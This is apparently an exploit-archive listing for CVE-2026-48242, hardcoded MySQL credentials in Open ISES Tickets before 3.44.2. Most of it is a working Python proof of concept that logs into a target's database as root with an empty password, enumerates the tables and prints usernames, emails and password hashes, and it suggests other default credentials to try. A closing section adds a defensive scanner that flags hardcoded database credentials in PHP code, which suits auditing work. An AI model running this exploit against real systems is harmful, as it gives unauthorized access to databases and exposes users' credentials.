Open ISES Tickets < 3.44.2 - Hardcoded MySQL Credentials

2026.05.27
Risk: Medium
Local: No
Remote: Yes

#!/usr/bin/env python3
# Exploit Title: Open ISES Tickets < 3.44.2 - Hardcoded MySQL Credentials
# CVE: CVE-2026-48242
# Date: 2026-05-25
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://github.com/openises/tickets
# Software Link: https://github.com/openises/tickets
# Affected: Open ISES Tickets < 3.44.2
# Tested on: Linux
# Category: WebApp
# Platform: PHP/MySQL
# Exploit Type: Credential Access
# CVSS: 9.1
# CWE : CWE-798
# Description: Open ISES Tickets contains hardcoded MySQL credentials in import functionality allowing unauthenticated database access.
# Fixed in: 3.44.2
# Usage: python3 exploit.py <target> --lhost <your_ip> --lport <your_port>
#
# Examples:
# python3 exploit.py 192.168.1.100
#
# Options:
#
# Notes:
#
# How to Use
#
# Step 1:

import argparse
import sys

import mysql.connector
from mysql.connector import Error

# Author banner (the block-letter art did not survive extraction; text lines kept).
print(r"""
[ b a n y a m e r _ s e c u r i t y ]
▸ Silent Hunter | Shadow Presence | Digital Intel ◂

Operator : Mohammed Idrees Banyamer • Jordan 🇯🇴
Handle   : @banyamer_security

Exploit  : CVE-2026-48242
Target   : Open ISES Tickets - Hardcoded MySQL Credentials

Status   : ACTIVE
""")

parser = argparse.ArgumentParser(description="CVE-2026-48242 PoC")
parser.add_argument("target", help="Target hostname or IP")
parser.add_argument("--port", type=int, default=3306, help="MySQL port")
parser.add_argument("--user", default="root", help="MySQL username")
parser.add_argument("--password", default="", help="MySQL password")
parser.add_argument("--database", default="tickets", help="Database name")
parser.add_argument("--lhost", help="Your IP (unused in this exploit)")
parser.add_argument("--lport", type=int, help="Your port (unused in this exploit)")
args = parser.parse_args()

print("[+] Open ISES Tickets CVE-2026-48242 PoC")
print(f"[+] Target: {args.target}:{args.port}")
print(f"[+] Credentials: {args.user} / {args.password or '(empty)'}")
print("-" * 70)

try:
    # Connect to the MySQL service with the supplied (default: root / empty) credentials.
    connection = mysql.connector.connect(
        host=args.target,
        port=args.port,
        user=args.user,
        password=args.password,
        database=args.database,
        connect_timeout=10
    )

    if connection.is_connected():
        print("[+] SUCCESS! Connected using hardcoded credentials!")
        cursor = connection.cursor()

        # Enumerate the tables in the selected database.
        cursor.execute("SHOW TABLES")
        tables = cursor.fetchall()
        print(f"\n[+] Found {len(tables)} tables:")
        for table in tables:
            print(f" - {table[0]}")

        # Read a few rows from the users table, if it exists with these columns.
        try:
            cursor.execute("SELECT username, email, password FROM users LIMIT 5")
            users = cursor.fetchall()
            if users:
                print("\n[+] Sample users:")
                for user in users:
                    print(f" {user[0]} | {user[1]} | {user[2][:50]}...")
        except Exception:
            # Table or columns absent, or unexpected row data: skip the sample.
            pass

        cursor.close()
        connection.close()
        print("\n[+] Database access successful.")

except Error as e:
    print(f"[-] Connection failed: {e}")
    print("[!] Try default credentials: root / (empty), root / tickets, etc.")
    sys.exit(1)
except Exception as e:
    print(f"[-] Error: {e}")
    sys.exit(1)

References:

https://github.com/openises/tickets/releases/tag/v3.44.2
https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff
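
For auditing PHP code for the same weakness class (CWE-798), the following added example, which is not part of the original PoC or of the Open ISES project, scans PHP source for database connector calls whose user and password arguments are string constants. It generalizes beyond the import functionality named above to `mysql_connect`, `mysqli_connect`, `new mysqli` and `new PDO`; the function names and the PHP sample are constructed for illustration, since this page does not show the vulnerable file.

```python
import re

# mysql_connect, mysqli_connect, new mysqli and new PDO all take
# (host-or-dsn, user, password, ...): arguments 1 and 2 are the credentials.
CALL_RE = re.compile(r"\b(new\s+mysqli|new\s+PDO|mysqli_connect|mysql_connect)\s*\(", re.I)
LITERAL_RE = re.compile(r"""^(['"])((?:\\.|(?!\1).)*)\1$""", re.S)

def split_args(src, pos):
    """Split a PHP argument list, starting just after '(', on top-level commas."""
    args, buf, depth, quote = [], "", 0, None
    while pos < len(src):
        ch = src[pos]
        if quote:                              # inside a string literal
            if ch == "\\":                     # keep the escape pair together
                ch, pos = src[pos:pos + 2], pos + 1
            elif ch == quote:
                quote = None
        elif ch in "'\"":
            quote = ch
        elif ch in "([":
            depth += 1
        elif ch in ")]" and depth:
            depth -= 1
        elif ch in ",)" and not depth:         # argument boundary or end of call
            args.append(buf.strip())
            if ch == ")":
                return args
            buf, ch = "", ""
        buf += ch
        pos += 1
    return args

def find_hardcoded_db_creds(php):
    """Return (line, call, user, password) for each connector call with literal creds."""
    hits = []
    for call in CALL_RE.finditer(php):
        lits = [LITERAL_RE.match(a) for a in split_args(php, call.end())[1:3]]
        # A double-quoted string containing '$' interpolates a variable: not a constant.
        if len(lits) == 2 and all(m and not (m[1] == '"' and "$" in m[2]) for m in lits):
            hits.append((php.count("\n", 0, call.start()) + 1, call[1], lits[0][2], lits[1][2]))
    return hits

# Constructed PHP sample (not taken from the Open ISES code base).
SAMPLE = """<?php
$a = mysqli_connect('localhost', 'root', '', 'tickets');
$b = new mysqli($cfg['host'], getenv('DB_USER'), getenv('DB_PASS'), 'tickets');
$c = new PDO("mysql:host=$h;dbname=tickets", "importer", "s3cr,et)");
$d = mysqli_connect($h, "$user", "$pass");
"""
```

`find_hardcoded_db_creds(SAMPLE)` reports lines 2 and 4 only. PHP comments are not stripped, so a commented-out connector call is reported as well.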



Copyright 2026, cxsecurity.com

 
